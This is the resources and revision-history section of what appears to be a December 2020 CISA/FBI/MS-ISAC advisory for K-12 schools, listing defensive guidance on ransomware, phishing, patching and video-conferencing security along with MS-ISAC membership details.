Resources MS-ISAC membership is open to employees or representatives from all public K-12 education entities in the United States. The MS-ISAC provides multiple cybersecurity services and benefits to help K-12 education entities increase their cybersecurity posture. To join, visit https://learn.cisecurity.org/ms-isac-registration. CISA Telework Guidance and Resources CISA Cybersecurity Recommendations and Tips for Schools Using Video Conferencing CISA Ransomware Publications CISA Emergency Services Sector Continuity Planning Suite CISA-MS-ISAC Joint Ransomware Guide CISA Tip: Avoiding Social Engineering and Phishing Attacks CISA Tip: Understanding Patches CISA and CYBER.ORG “Cyber Safety Video Series” for K-12 students and educators FBI PSA: “High-Impact Ransomware Attacks Threaten U.S. Businesses and Organizations Note: contact your local FBI field office (www.fbi.gov/contact-us/field) for additional FBI products on ransomware, edtech, and cybersecurity for educational institutions. Revisions Initial Version: December 10, 2020 This product is provided subject to this Notification and this Privacy & Use policy.

News (DARKReading, The Hacker News, Threatpost)